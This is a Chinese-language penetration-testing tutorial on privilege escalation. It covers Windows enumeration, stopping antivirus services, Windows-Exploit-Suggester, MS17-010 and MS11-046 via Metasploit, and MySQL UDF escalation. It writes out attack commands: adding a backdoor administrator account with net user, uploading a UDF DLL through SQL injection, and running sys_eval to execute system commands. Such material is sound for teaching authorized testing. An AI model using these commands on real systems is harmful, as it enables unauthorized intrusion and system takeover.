010108权限提升

8-1提权基础 服务器配置（以apache2为例）

1. 提权本质

提权本质就是提升自己在服务器中的权限，获得更大的权限。

例如：在Windows下普通用户，通过提权获得Administrator一样的权限；在Linux中通过执行编译后的程序，从普通用户权限提升到root账号权限。

2. 提权分类

提权分为本地提权和远程提权

提权分为系统提权和第三方软件提权

3. 权限配置

一般情况下，Web服务会给与一个特定低权限用户维护服务，避免给与过高权限。

4. 菜刀连接测试

使用中国菜刀工具在不同权限下执行 net user username password /add 查看不同的结果。

8-2Windows系统提权基础命令

1. 获取IP地址信息

IP地址是计算机在网络中的门牌号，用来寻找计算机的地址。同一台计算机有多个IP地址，可以有外部连接的IP地址，内部IP地址。

在提权过程中，如果有外网IP地址，可以直接使用3389端口进行远程桌面连接。如果只有内网IP地址，可以使用LCX等程序进行端口转发进行连接登录。

在Windows系统下使用ipconfig /all 查看网卡信息。

2. 获取端口信息

端口是计算机与外部连接的一个接口，每一个开放的服务对应一个端口，用来进行连接。

在Windows下可以使用  netstat 命令获取端口开放状态。

netstat -an  获取当前主机所有端口的开放情况及网络连接情况。

3. 获取服务信息和进程信息

在Windows系统下很多第三方软件都使用服务启动。如果使用第三方软件漏洞进行提权，必须了解以服务方式开启的第三方软件。

可以使用  net start 命令查看系统所开启的所有服务

也可以使用 net stop 服务名称   关闭服务，例如杀毒软件等。

在Windows系统下可以使用  tasklist /svc 命令获取运行的进程名称、服务和PID。

4. 进程结束、用户管理命令

使用 taskkill来结束进程。 taskkill /? 获取帮助信息。

在Windows系统下，系统访问需要有对应的用户和密码。

可以通过以下命令添加用户：
net user username password /add
net localgroup administrator username /add

8-3Windows提权辅助工具

1. 辅助工具介绍

Windows-Exploit-Suggester 此工具将目标补丁与Microsoft漏洞数据库进行比较，以检测目标上潜在的缺失补丁。

GitHub - AonCyberLabs/Windows-Exploit-Suggester: This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.

2. 辅助工具安装

环境：python2.7、安装xlrd模块

执行 --update以获取漏洞文件

3. 辅助工具命令行介绍

使用 -h 参数获取帮助信息。

 

4. 辅助工具使用技巧

查看本机补丁与漏洞文件中，可能存在的POC。

8-4Windows远程提权（以ms17-010为例）

1. 远程提权

在授权的情况下，针对目标机器进行渗透测试，需要对目标进行提权。可以首先扫描系统是否存在可利用漏洞，探测是否可以利用。

如何可以直接利用获得最高权限，那么就不需要本地提权，直接远程提权拿到最高权限。

2. ms17-010介绍

MS17-010是一个安全类型的补丁，MS17-010更新修复了 Microsoft Windows中的漏洞。 如果攻击者向 Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特殊设计的消息，则其中最严重的漏洞可能允许远程代码执行。

WannaCry（又叫Wanna Decryptor），一种“蠕虫式”的勒索病毒软件，大小3.3MB，由不法分子利用NSA（National Security Agency，美国国家安全局）泄露的危险漏洞“EternalBlue”（永恒之蓝）进行传播 。勒索病毒肆虐，俨然是一场全球性互联网灾难，给广大电脑用户造成了巨大损失。最新统计数据显示，100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。 勒索病毒是自熊猫烧香以来影响力最大的病毒之一。

3. 扫描探测ms17-010漏洞

在metasploit下直接利用ms17-010的漏洞扫描模块进行探测。

4. 利用ms17-010漏洞提权

在Metasploit下集成了ms17-010的漏洞利用模块 

 

8-5Windows本地提权（以ms11-046为例）

1. 系统提权目的

一般情况下，系统管理员只会给与Web服务一个权限比较低的用户来运行。

系统提权的目的：就是利用系统漏洞来提升当前的运行权限，或者说时添加一个高权限用户。

2. 系统提权流程

1、获取执行cmd命令窗口，使用 systeminfo 查看当前系统补丁信息。

2、利用工具对不出没有打的补丁。

3. ms11_046提权

利用ms11_046提权。

4. 远程桌面连接

本地执行远程桌面客户端，连接服务端。

8-6Mysql UDF提权

1. udf介绍

UDF是mysql的一个拓展接口，UDF（Userdefined function）可翻译为用户自定义函数，这个是用来拓展Mysql的技术手段。

在提权过程中，经常使用mysql 的udf.dll进行提权。并且提权之前，要上传udf.dll到指定的目录下。
使用 select @@plugin_dir;或 show variables like 'plugin%'; 查看具体目录。

修改目录方式：
1、mysqld.exe --plugin-dir=具体目录
2、mysqld.exe --defaults-file=具体目录
3、mysql.ini配置文件  plugin_dir=具体目录

2. udf.dll获取

sqlmap下自带了对应提权使用的udf库。可以直接下载使用，但是sqlmap进行加密，需要解密。

root@kali:/usr/share/sqlmap/extra/cloak# ./cloak.py -d -i /usr/share/sqlmap/udf/mysql/windows/32/lib_mysqludf_sys.dll_ 

3. 上传udf

将udf.dll文件上传到 具体目录下。
select @@plugin_dir;或 show variables like 'plugin%'; 

利用sql注入进行上传 select load_file() into dumpfile “具体路径”

直接利用菜刀拖拽到具体目录下。

4. 执行提权命令

create function sys_eval returns string soname 'udf.dll';

select * from mysql.func where name = 'sys_eval';

select sys_eval('dir');

select sys_eval('net user user1 123 /add');

select sys_eval('net localgroup administrators user1 /add');

drop function sys_eval;